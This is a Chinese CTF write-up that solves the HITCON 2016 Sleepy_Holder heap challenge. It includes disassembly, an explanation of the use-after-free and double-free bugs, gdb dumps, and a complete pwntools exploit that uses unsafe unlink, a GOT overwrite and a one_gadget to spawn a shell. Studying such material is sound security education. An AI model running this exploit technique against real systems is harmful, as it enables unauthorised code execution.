pwn HITCONCTF2016 Sleepy_Holder
题目复现
$ file SleepyHolder
SleepyHolder: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=46f0e70abd9460828444d7f0975a8b2f2ddbad46, stripped
$ checksec -f SleepyHolder
RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH Yes 0 2 SleepyHolder
$ strings libc.so.6 | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 5.3.1 20160413.
64 位程序,开启了 Canary 和 NX,默认开启 ASLR。
在 Ubuntu-16.04 上玩一下:
$ ./SleepyHolder
Waking Sleepy Holder up ...
Hey! Do you have any secret?
I can help you to hold your secrets, and no one will be able to see it :)
1. Keep secret
2. Wipe secret
3. Renew secret
1
What secret do you want to keep?
1. Small secret
2. Big secret
3. Keep a huge secret and lock it forever
1
Tell me your secret:
AAAA
1. Keep secret
2. Wipe secret
3. Renew secret
1
What secret do you want to keep?
1. Small secret
2. Big secret
3. Keep a huge secret and lock it forever
3
Tell me your secret:
CCCC
1. Keep secret
2. Wipe secret
3. Renew secret
3
Which Secret do you want to renew?
1. Small secret
2. Big secret
1
Tell me your secret:
BBBB
1. Keep secret
2. Wipe secret
3. Renew secret
2
Which Secret do you want to wipe?
1. Small secret
2. Big secret
1
这一题看起来和上一题 Secret_Holder 差不多。同样是 small、big、huge 三种 secret,不同的是这里的 huge secret 是不可修改和删除的。
题目解析
下面我们逐个来逆向这些功能。
Keep secret
[0x00400850]> pdf @ sub.What_secret_do_you_want_to_keep_93d
/ (fcn) sub.What_secret_do_you_want_to_keep_93d 452
| sub.What_secret_do_you_want_to_keep_93d ();
| ; var int local_14h @ rbp-0x14
| ; var int local_10h @ rbp-0x10
| ; var int local_8h @ rbp-0x8
| ; CALL XREF from 0x00400e3c (main)
| 0x0040093d push rbp
| 0x0040093e mov rbp, rsp
| 0x00400941 sub rsp, 0x20
| 0x00400945 mov rax, qword fs:[0x28] ; [0x28:8]=-1 ; '(' ; 40
| 0x0040094e mov qword [local_8h], rax
| 0x00400952 xor eax, eax
| 0x00400954 mov edi, str.What_secret_do_you_want_to_keep ; 0x400ee8 ; "What secret do you want to keep?"
| 0x00400959 call sym.imp.puts ; int puts(const char *s)
| 0x0040095e mov edi, str.1._Small_secret ; 0x400f09 ; "1. Small secret"
| 0x00400963 call sym.imp.puts ; int puts(const char *s)
| 0x00400968 mov edi, str.2._Big_secret ; 0x400f19 ; "2. Big secret"
| 0x0040096d call sym.imp.puts ; int puts(const char *s)
| 0x00400972 mov eax, dword [0x006020dc] ; huge_flag,表示 huge secret 是否已存在
| 0x00400978 test eax, eax
| ,=< 0x0040097a jne 0x400986 ; huge_flag 为 1 时跳转
| | 0x0040097c mov edi, str.3._Keep_a_huge_secret_and_lock_it_forever ; 0x400f28 ; "3. Keep a huge secret and lock it forever"
| | 0x00400981 call sym.imp.puts ; 否则打印出来
| | ; JMP XREF from 0x0040097a (sub.What_secret_do_you_want_to_keep_93d)
| `-> 0x00400986 lea rax, [local_10h]
| 0x0040098a mov edx, 4
| 0x0040098f mov esi, 0
| 0x00400994 mov rdi, rax
| 0x00400997 call sym.imp.memset ; void *memset(void *s, int c, size_t n)
| 0x0040099c lea rax, [local_10h]
| 0x004009a0 mov edx, 4
| 0x004009a5 mov rsi, rax
| 0x004009a8 mov edi, 0
| 0x004009ad mov eax, 0
| 0x004009b2 call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
| 0x004009b7 lea rax, [local_10h]
| 0x004009bb mov rdi, rax
| 0x004009be call sym.imp.atoi ; int atoi(const char *str)
| 0x004009c3 mov dword [local_14h], eax
| 0x004009c6 mov eax, dword [local_14h]
| 0x004009c9 cmp eax, 2 ; 2
| ,=< 0x004009cc je 0x400a3d ; big secret
| | 0x004009ce cmp eax, 3 ; 3
| ,==< 0x004009d1 je 0x400a96 ; huge secret
| || 0x004009d7 cmp eax, 1 ; 1
| ,===< 0x004009da je 0x4009e1 ; small secret
| ,====< 0x004009dc jmp 0x400aeb
| |||| ; JMP XREF from 0x004009da (sub.What_secret_do_you_want_to_keep_93d)
| |`---> 0x004009e1 mov eax, dword [0x006020e0] ; small_flag,表示 small secret 是否已存在
| | || 0x004009e7 test eax, eax
| |,===< 0x004009e9 je 0x4009f0 ; small_flag 为 0 时
| ,=====< 0x004009eb jmp 0x400aeb
| ||||| ; JMP XREF from 0x004009e9 (sub.What_secret_do_you_want_to_keep_93d)
| ||`---> 0x004009f0 mov esi, 0x28 ; '(' ; 40
| || || 0x004009f5 mov edi, 1
| || || 0x004009fa call sym.imp.calloc ; calloc(1, 0x28) 为 small secret 分配空间
| || || 0x004009ff mov qword [0x006020d0], rax ; 把地址放到 [0x006020d0]
| || || 0x00400a06 mov dword [0x006020e0], 1 ; 设置 small_flag 为 1
| || || 0x00400a10 mov edi, str.Tell_me_your_secret: ; 0x400f52 ; "Tell me your secret: "
| || || 0x00400a15 call sym.imp.puts ; int puts(const char *s)
| || || 0x00400a1a mov rax, qword [0x006020d0] ; [0x6020d0:8]=0
| || || 0x00400a21 mov edx, 0x28 ; '(' ; 40
| || || 0x00400a26 mov rsi, rax
| || || 0x00400a29 mov edi, 0
| || || 0x00400a2e mov eax, 0
| || || 0x00400a33 call sym.imp.read ; read(0, [0x006020d0], 0x28) 读入 small secret
| ||,===< 0x00400a38 jmp 0x400aeb
| ||||| ; JMP XREF from 0x004009cc (sub.What_secret_do_you_want_to_keep_93d)
| ||||`-> 0x00400a3d mov eax, dword [0x006020d8] ; big_flag,表示 big secret 是否已存在
| |||| 0x00400a43 test eax, eax
| ||||,=< 0x00400a45 je 0x400a4c ; big_flag 为 0 时
| ,======< 0x00400a47 jmp 0x400aeb
| |||||| ; JMP XREF from 0x00400a45 (sub.What_secret_do_you_want_to_keep_93d)
| |||||`-> 0x00400a4c mov esi, 0xfa0 ; 4000
| ||||| 0x00400a51 mov edi, 1
| ||||| 0x00400a56 call sym.imp.calloc ; calloc(1, 0xfa0) 为 big secret 分配空间
| ||||| 0x00400a5b mov qword [0x006020c0], rax ; 把地址放到 [0x006020c0]
| ||||| 0x00400a62 mov dword [0x006020d8], 1 ; 设置 big_flag 为 1
| ||||| 0x00400a6c mov edi, str.Tell_me_your_secret: ; 0x400f52 ; "Tell me your secret: "
| ||||| 0x00400a71 call sym.imp.puts ; int puts(const char *s)
| ||||| 0x00400a76 mov rax, qword [0x006020c0] ; [0x6020c0:8]=0
| ||||| 0x00400a7d mov edx, 0xfa0 ; 4000
| ||||| 0x00400a82 mov rsi, rax
| ||||| 0x00400a85 mov edi, 0
| ||||| 0x00400a8a mov eax, 0
| ||||| 0x00400a8f call sym.imp.read ; read(0, [0x006020c0], 0xfa0) 读入 big secret
| |||||,=< 0x00400a94 jmp 0x400aeb
| |||||| ; JMP XREF from 0x004009d1 (sub.What_secret_do_you_want_to_keep_93d)
| ||||`--> 0x00400a96 mov eax, dword [0x006020dc] ; huge_flag,表示 huge secret 是否已存在
| |||| | 0x00400a9c test eax, eax
| ||||,==< 0x00400a9e je 0x400aa2 ; huge_flag 为 0 时
| ,=======< 0x00400aa0 jmp 0x400aeb
| ||||||| ; JMP XREF from 0x00400a9e (sub.What_secret_do_you_want_to_keep_93d)
| |||||`--> 0x00400aa2 mov esi, 0x61a80
| ||||| | 0x00400aa7 mov edi, 1
| ||||| | 0x00400aac call sym.imp.calloc ; calloc(1, 0x61a80) 为 huge secret 分配空间
| ||||| | 0x00400ab1 mov qword [0x006020c8], rax ; 把地址放到 [0x006020c8]
| ||||| | 0x00400ab8 mov dword [0x006020dc], 1 ; 设置 huge_flag 为 1
| ||||| | 0x00400ac2 mov edi, str.Tell_me_your_secret: ; 0x400f52 ; "Tell me your secret: "
| ||||| | 0x00400ac7 call sym.imp.puts ; int puts(const char *s)
| ||||| | 0x00400acc mov rax, qword [0x006020c8] ; [0x6020c8:8]=0
| ||||| | 0x00400ad3 mov edx, 0x61a80
| ||||| | 0x00400ad8 mov rsi, rax
| ||||| | 0x00400adb mov edi, 0
| ||||| | 0x00400ae0 mov eax, 0
| ||||| | 0x00400ae5 call sym.imp.read ; read(0, [0x006020c8], 0x61a80) 读入 huge secret
| ||||| | 0x00400aea nop
| ||||| | ; XREFS: JMP 0x004009dc JMP 0x004009eb JMP 0x00400a38 JMP 0x00400a47 JMP 0x00400a94 JMP 0x00400aa0
| `````-`-> 0x00400aeb mov rax, qword [local_8h]
| 0x00400aef xor rax, qword fs:[0x28]
| ,=< 0x00400af8 je 0x400aff
| | 0x00400afa call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
| | ; JMP XREF from 0x00400af8 (sub.What_secret_do_you_want_to_keep_93d)
| `-> 0x00400aff leave
\ 0x00400b00 ret
还是一样的,该函数使用 calloc()
为三种 secret 分别了不同大小的 chunk,small secret 属于 small chunk,big secret 和 huge secret 属于 large chunk。在分配前,会检查对应的 secret 是否已经存在,即每种 chunk 只能有一个。另外看函数开头部分,huge secret 显然受到了特殊处理。
- small secret: small chunk, 40 bytes
- small_ptr: 0x006020d0
- small_flag: 0x006020e0
- big secret: large chunk, 4000 bytes
- big_ptr: 0x006020c0
- big_flag: 0x006020d8
- huge secret: large chunk, 400000 bytes
- huge_ptr: 0x006020c8
- huge_flag: 0x006020dc
Wipe secret
[0x00400850]> pdf @ sub.Which_Secret_do_you_want_to_wipe_b01
/ (fcn) sub.Which_Secret_do_you_want_to_wipe_b01 207
| sub.Which_Secret_do_you_want_to_wipe_b01 ();
| ; var int local_14h @ rbp-0x14
| ; var int local_10h @ rbp-0x10
| ; var int local_8h @ rbp-0x8
| ; CALL XREF from 0x00400e48 (main)
| 0x00400b01 push rbp
| 0x00400b02 mov rbp, rsp
| 0x00400b05 sub rsp, 0x20
| 0x00400b09 mov rax, qword fs:[0x28] ; [0x28:8]=-1 ; '(' ; 40
| 0x00400b12 mov qword [local_8h], rax
| 0x00400b16 xor eax, eax
| 0x00400b18 mov edi, str.Which_Secret_do_you_want_to_wipe ; 0x400f68 ; "Which Secret do you want to wipe?"
| 0x00400b1d call sym.imp.puts ; int puts(const char *s)
| 0x00400b22 mov edi, str.1._Small_secret ; 0x400f09 ; "1. Small secret"
| 0x00400b27 call sym.imp.puts ; int puts(const char *s)
| 0x00400b2c mov edi, str.2._Big_secret ; 0x400f19 ; "2. Big secret"
| 0x00400b31 call sym.imp.puts ; int puts(const char *s)
| 0x00400b36 lea rax, [local_10h]
| 0x00400b3a mov edx, 4
| 0x00400b3f mov esi, 0
| 0x00400b44 mov rdi, rax
| 0x00400b47 call sym.imp.memset ; void *memset(void *s, int c, size_t n)
| 0x00400b4c lea rax, [local_10h]
| 0x00400b50 mov edx, 4
| 0x00400b55 mov rsi, rax
| 0x00400b58 mov edi, 0
| 0x00400b5d mov eax, 0
| 0x00400b62 call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
| 0x00400b67 lea rax, [local_10h]
| 0x00400b6b mov rdi, rax
| 0x00400b6e call sym.imp.atoi ; int atoi(const char *str)
| 0x00400b73 mov dword [local_14h], eax
| 0x00400b76 mov eax, dword [local_14h]
| 0x00400b79 cmp eax, 1 ; 1
| ,=< 0x00400b7c je 0x400b85 ; small secret
| | 0x00400b7e cmp eax, 2 ; 2
| ,==< 0x00400b81 je 0x400ba0 ; big secret
| ,===< 0x00400b83 jmp 0x400bba
| ||| ; JMP XREF from 0x00400b7c (sub.Which_Secret_do_you_want_to_wipe_b01)
| ||`-> 0x00400b85 mov rax, qword [0x006020d0] ; [0x6020d0:8]=0
| || 0x00400b8c mov rdi, rax
| || 0x00400b8f call sym.imp.free ; free([0x006020d0]) 释放 small secret
| || 0x00400b94 mov dword [0x006020e0], 0 ; 设置 small_flag 为 0
| ||,=< 0x00400b9e jmp 0x400bba
| ||| ; JMP XREF from 0x00400b81 (sub.Which_Secret_do_you_want_to_wipe_b01)
| |`--> 0x00400ba0 mov rax, qword [0x006020c0] ; [0x6020c0:8]=0
| | | 0x00400ba7 mov rdi, rax
| | | 0x00400baa call sym.imp.free ; free([0x006020c0]) 释放 big secret
| | | 0x00400baf mov dword [0x006020d8], 0 ; 设置 big_flag 为 0
| | | 0x00400bb9 nop
| | | ; JMP XREF from 0x00400b83 (sub.Which_Secret_do_you_want_to_wipe_b01)
| | | ; JMP XREF from 0x00400b9e (sub.Which_Secret_do_you_want_to_wipe_b01)
| `-`-> 0x00400bba mov rax, qword [local_8h]
| 0x00400bbe xor rax, qword fs:[0x28]
| ,=< 0x00400bc7 je 0x400bce
| | 0x00400bc9 call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
| | ; JMP XREF from 0x00400bc7 (sub.Which_Secret_do_you_want_to_wipe_b01)
| `-> 0x00400bce leave
\ 0x00400bcf ret
该函数只能释放 small secret 和 big secret。释放的过程首先将对应的 chunk 释放掉,然后设置对应 flag 为 0。漏洞很明显,就是没有将 chunk 指针清空,存在悬指针,可能导致 use-after-free,然后在释放前,也没有检查 flag,可能导致 double-free。
Renew secret
[0x00400850]> pdf @ sub.Which_Secret_do_you_want_to_renew_bd0
/ (fcn) sub.Which_Secret_do_you_want_to_renew_bd0 259
| sub.Which_Secret_do_you_want_to_renew_bd0 ();
| ; var int local_14h @ rbp-0x14
| ; var int local_10h @ rbp-0x10
| ; var int local_8h @ rbp-0x8
| ; CALL XREF from 0x00400e54 (main)
| 0x00400bd0 push rbp
| 0x00400bd1 mov rbp, rsp
| 0x00400bd4 sub rsp, 0x20
| 0x00400bd8 mov rax, qword fs:[0x28] ; [0x28:8]=-1 ; '(' ; 40
| 0x00400be1 mov qword [local_8h], rax
| 0x00400be5 xor eax, eax
| 0x00400be7 mov edi, str.Which_Secret_do_you_want_to_renew ; 0x400f90 ; "Which Secret do you want to renew?"
| 0x00400bec call sym.imp.puts ; int puts(const char *s)
| 0x00400bf1 mov edi, str.1._Small_secret ; 0x400f09 ; "1. Small secret"
| 0x00400bf6 call sym.imp.puts ; int puts(const char *s)
| 0x00400bfb mov edi, str.2._Big_secret ; 0x400f19 ; "2. Big secret"
| 0x00400c00 call sym.imp.puts ; int puts(const char *s)
| 0x00400c05 lea rax, [local_10h]
| 0x00400c09 mov edx, 4
| 0x00400c0e mov esi, 0
| 0x00400c13 mov rdi, rax
| 0x00400c16 call sym.imp.memset ; void *memset(void *s, int c, size_t n)
| 0x00400c1b lea rax, [local_10h]
| 0x00400c1f mov edx, 4
| 0x00400c24 mov rsi, rax
| 0x00400c27 mov edi, 0
| 0x00400c2c mov eax, 0
| 0x00400c31 call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
| 0x00400c36 lea rax, [local_10h]
| 0x00400c3a mov rdi, rax
| 0x00400c3d call sym.imp.atoi ; int atoi(const char *str)
| 0x00400c42 mov dword [local_14h], eax
| 0x00400c45 mov eax, dword [local_14h]
| 0x00400c48 cmp eax, 1 ; 1
| ,=< 0x00400c4b je 0x400c54 ; small secret
| | 0x00400c4d cmp eax, 2 ; 2
| ,==< 0x00400c50 je 0x400c8a ; big secret
| ,===< 0x00400c52 jmp 0x400cbd
| ||| ; JMP XREF from 0x00400c4b (sub.Which_Secret_do_you_want_to_renew_bd0)
| ||`-> 0x00400c54 mov eax, dword [0x006020e0] ; [0x6020e0:4]=0
| || 0x00400c5a test eax, eax
| ||,=< 0x00400c5c je 0x400c88 ; small_flag 为 0 时,函数返回
| ||| 0x00400c5e mov edi, str.Tell_me_your_secret: ; 0x400f52 ; "Tell me your secret: "
| ||| 0x00400c63 call sym.imp.puts ; int puts(const char *s)
| ||| 0x00400c68 mov rax, qword [0x006020d0] ; [0x6020d0:8]=0
| ||| 0x00400c6f mov edx, 0x28 ; '(' ; 40
| ||| 0x00400c74 mov rsi, rax
| ||| 0x00400c77 mov edi, 0
| ||| 0x00400c7c mov eax, 0
| ||| 0x00400c81 call sym.imp.read ; read(0, [0x006020d0], 0x28) 否则读入 small secret
| ,====< 0x00400c86 jmp 0x400cbd
| |||| ; JMP XREF from 0x00400c5c (sub.Which_Secret_do_you_want_to_renew_bd0)
| ,===`-> 0x00400c88 jmp 0x400cbd
| |||| ; JMP XREF from 0x00400c50 (sub.Which_Secret_do_you_want_to_renew_bd0)
| |||`--> 0x00400c8a mov eax, dword [0x006020d8] ; [0x6020d8:4]=0
| ||| 0x00400c90 test eax, eax
| ||| ,=< 0x00400c92 je 0x400cbc ; big_flag 为 0 时,函数返回
| ||| | 0x00400c94 mov edi, str.Tell_me_your_secret: ; 0x400f52 ; "Tell me your secret: "
| ||| | 0x00400c99 call sym.imp.puts ; int puts(const char *s)
| ||| | 0x00400c9e mov rax, qword [0x006020c0] ; [0x6020c0:8]=0
| ||| | 0x00400ca5 mov edx, 0xfa0 ; 4000
| ||| | 0x00400caa mov rsi, rax
| ||| | 0x00400cad mov edi, 0
| ||| | 0x00400cb2 mov eax, 0
| ||| | 0x00400cb7 call sym.imp.read ; read(0, [0x006020c0], 0xfa0) 否则读入 big secret
| ||| | ; JMP XREF from 0x00400c92 (sub.Which_Secret_do_you_want_to_renew_bd0)
| ||| `-> 0x00400cbc nop
| ||| ; JMP XREF from 0x00400c52 (sub.Which_Secret_do_you_want_to_renew_bd0)
| ||| ; JMP XREF from 0x00400c86 (sub.Which_Secret_do_you_want_to_renew_bd0)
| ||| ; JMP XREF from 0x00400c88 (sub.Which_Secret_do_you_want_to_renew_bd0)
| ```---> 0x00400cbd mov rax, qword [local_8h]
| 0x00400cc1 xor rax, qword fs:[0x28]
| ,=< 0x00400cca je 0x400cd1
| | 0x00400ccc call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
| | ; JMP XREF from 0x00400cca (sub.Which_Secret_do_you_want_to_renew_bd0)
| `-> 0x00400cd1 leave
\ 0x00400cd2 ret
该函数只能对 small secret 和 big secret 进行修改,所以 huge secret 就是一次分配,永远存在且内容不可修改了。过程是首先判断对应的 flag 是否为 1,即 secret 是否已经存在,如果不存在,则读入 secret,否则函数直接返回。
漏洞利用
总结一下我们知道的东西:
- small secret: small chunk, 40 bytes
- small_ptr: 0x006020d0
- small_flag: 0x006020e0
- big secret: large chunk, 4000 bytes
- big_ptr: 0x006020c0
- big_flag: 0x006020d8
- huge secret: large chunk, 400000 bytes
- huge_ptr: 0x006020c8
- huge_flag: 0x006020dc
漏洞:
- double-free:在 free chunk 的位置 calloc 另一个 chunk,即可再次 free 这个 chunk
- use-after-free:由于 double-free,calloc 出来的那个 chunk 被认为是 free 的,但可以使用
看到这里该题与上一题的差别很明显了,就是我们没有办法再通过 keep(huge) -> wipe(huge) -> keep(huge)
来利用 brk()
分配内存,制造 unsafe unlink。
然后我们又在 _int_malloc()
中发现了另一个东西:
static void*
_int_malloc(mstate av, size_t bytes)
{
/*
If this is a large request, consolidate fastbins before continuing.
While it might look excessive to kill all fastbins before
even seeing if there is space available, this avoids
fragmentation problems normally associated with fastbins.
Also, in practice, programs tend to have runs of either small or
large requests, but less often mixtures, so consolidation is not
invoked all that often in most programs. And the programs that
it is called frequently in otherwise tend to fragment.
*/
else {
idx = largebin_index(nb);
if (have_fastchunks(av))
malloc_consolidate(av);
}
当需求 chunk 是一个 large chunk 时,glibc 会将把 fastbins 中的 chunk 移除,设置 PREV_INUSE
为 0,合并 free chunk,然后放到 unsorted bin。接着 glibc 尝试从 unsorted bin 中取出 chunk,由于大小不合适,这些 chunk 又被放到 small bin 中:
/* place chunk in bin */
if (in_smallbin_range (size))
{
victim_index = smallbin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;
}
这时就可以再次释放 small secret 而不触发 double-free 的检测。
那么为什么一定要将 small secret 放进 small bin 呢?因为当 chunk 被放进 small bin 时,会相应的修改 next chunk(即big secret)的 chunk header(设置prev_size,PREV_INUSE
置0),而当 chunk 被放进 fastbins 时是不会有这样的操作的。接下来我们需要通过 double-free 将 small secret 再次放进 fastbins(这时small secret同时存在于fastbins和small bin中),再从 fastbins 中取出 small secret,原因和上面类似,从 fastbins 中取出 chunk 不会设置 next chunk 的 chunk header。这样我们才能正确地触发 unlink。
unsafe unlink
def unlink():
keep(1, "AAAA") # small
keep(2, "AAAA") # big
wipe(1) # put small into fastbins
keep(3, "AAAA") # huge # put small into small bin
wipe(1) # double free # put small into fastbins
payload = p64(0) + p64(0x21) # fake header
payload += p64(small_ptr - 0x18) # fake fd
payload += p64(small_ptr - 0x10) # fake bk
payload += p64(0x20) # fake prev_size
keep(1, payload)
wipe(2) # unsafe unlink
制造 double-free:
gdb-peda$ x/5gx 0x006020c0
0x6020c0: 0x0000000000603560 0x00007ffff7f92010
0x6020d0: 0x0000000000603530 0x0000000100000001
0x6020e0: 0x0000000000000000
gdb-peda$ x/10gx 0x00603530-0x10
0x603520: 0x0000000000000000 0x0000000000000031 <-- small
0x603530: 0x0000000000000000 0x00007ffff7dd1b98
0x603540: 0x0000000000000000 0x0000000000000000
0x603550: 0x0000000000000030 0x0000000000000fb0 <-- big <-- PREV_INUSE
0x603560: 0x0000000041414141 0x0000000000000000
上面的过程一方面通过 malloc_consolidate 设置了 big secret 的 PREV_INUSE,另一方面通过 double-free 将 small secret 放进 fastbins。
在 small secret 中布置上一个 fake chunk:
gdb-peda$ x/5gx 0x006020c0
0x6020c0: 0x0000000000603560 0x00007ffff7f92010
0x6020d0: 0x0000000000603530 0x0000000100000001
0x6020e0: 0x0000000000000001
gdb-peda$ x/10gx 0x00603530-0x10
0x603520: 0x0000000000000000 0x0000000000000031
0x603530: 0x0000000000000000 0x0000000000000021 <-- fake chunk
0x603540: 0x00000000006020b8 0x00000000006020c0 <-- fd, bk pointer
0x603550: 0x0000000000000020 0x0000000000000fb0 <-- big <-- fake prev_size
0x603560: 0x0000000041414141 0x0000000000000000
gdb-peda$ x/gx 0x006020b8 + 0x18
0x6020d0: 0x0000000000603530 <-- P->fd->bk = P
gdb-peda$ x/gx 0x006020c0 + 0x10
0x6020d0: 0x0000000000603530 <-- P->bk->fd = P
释放 big secret 即可触发 unsafe unlink:
gdb-peda$ x/6gx 0x006020b8
0x6020b8: 0x0000000000000000 0x0000000000603560
0x6020c8: 0x00007ffff7f92010 0x00000000006020b8 <-- fake chunk ptr
0x6020d8: 0x0000000100000000 0x0000000000000001
于是我们就获得了修改 .bss
段的能力。
后面的过程就和上一题完全一样了。
leak libc
def leak():
global one_gadget
payload = "A" * 8
payload += p64(elf.got['free']) # big_ptr -> free@got.plt
payload += "A" * 8
payload += p64(big_ptr) # small_ptr -> big_ptr
payload += p32(1) # big_flag
renew(1, payload)
renew(2, p64(elf.plt['puts'])) # free@got.plt -> puts@plt
renew(1, p64(elf.got['puts'])) # big_ptr -> puts@got.plt
wipe(2)
puts_addr = u64(io.recvline()[:6] + "\x00\x00")
libc_base = puts_addr - libc.symbols['puts']
one_gadget = libc_base + 0x4525a
log.info("libc base: 0x%x" % libc_base)
log.info("one_gadget address: 0x%x" % one_gadget)
pwn
def pwn():
payload = "A" * 0x10
payload += p64(elf.got['puts']) # small_ptr -> puts@got.plt
renew(1, payload)
renew(1, p64(one_gadget)) # puts@got.plt -> one_gadget
io.interactive()
开启 ASLR,Bingo!!!
$ python exp.py
[+] Starting local process './SleepyHolder': pid 8352
[*] libc base: 0x7ffbcd987000
[*] one_gadget address: 0x7ffbcd9cc25a
[*] Switching to interactive mode
$ whoami
firmy
exploit
完整的 exp 如下:
#!/usr/bin/env python
from pwn import *
#context.log_level = 'debug'
io = process(['./SleepyHolder'], env={'LD_PRELOAD':'./libc.so.6'})
elf = ELF('SleepyHolder')
libc = ELF('libc.so.6')
small_ptr = 0x006020d0
big_ptr = 0x006020c0
def keep(idx, content):
io.sendlineafter("Renew secret\n", '1')
io.sendlineafter("Big secret\n", str(idx))
io.sendafter("secret: \n", content)
def wipe(idx):
io.sendlineafter("Renew secret\n", '2')
io.sendlineafter("Big secret\n", str(idx))
def renew(idx, content):
io.sendlineafter("Renew secret\n", '3')
io.sendlineafter("Big secret\n", str(idx))
io.sendafter("secret: \n", content)
def unlink():
keep(1, "AAAA") # small
keep(2, "AAAA") # big
wipe(1) # put small into fastbins
keep(3, "AAAA") # huge # put small into small bin
wipe(1) # double free # put small into fastbins
payload = p64(0) + p64(0x21) # fake header
payload += p64(small_ptr - 0x18) # fake fd
payload += p64(small_ptr - 0x10) # fake bk
payload += p64(0x20) # fake prev_size
keep(1, payload)
wipe(2) # unsafe unlink
def leak():
global one_gadget
payload = "A" * 8
payload += p64(elf.got['free']) # big_ptr -> free@got.plt
payload += "A" * 8
payload += p64(big_ptr) # small_ptr -> big_ptr
payload += p32(1) # big_flag
renew(1, payload)
renew(2, p64(elf.plt['puts'])) # free@got.plt -> puts@plt
renew(1, p64(elf.got['puts'])) # big_ptr -> puts@got.plt
wipe(2)
puts_addr = u64(io.recvline()[:6] + "\x00\x00")
libc_base = puts_addr - libc.symbols['puts']
one_gadget = libc_base + 0x4525a
log.info("libc base: 0x%x" % libc_base)
log.info("one_gadget address: 0x%x" % one_gadget)
def pwn():
payload = "A" * 0x10
payload += p64(elf.got['puts']) # small_ptr -> puts@got.plt
renew(1, payload)
renew(1, p64(one_gadget)) # puts@got.plt -> one_gadget
io.interactive()
if __name__ == "__main__":
unlink()
leak()
pwn()
参考资料
- https://ctftime.org/task/4812
- https://github.com/mehQQ/public_writeup/tree/master/hitcon2016/SleepyHolder
Comments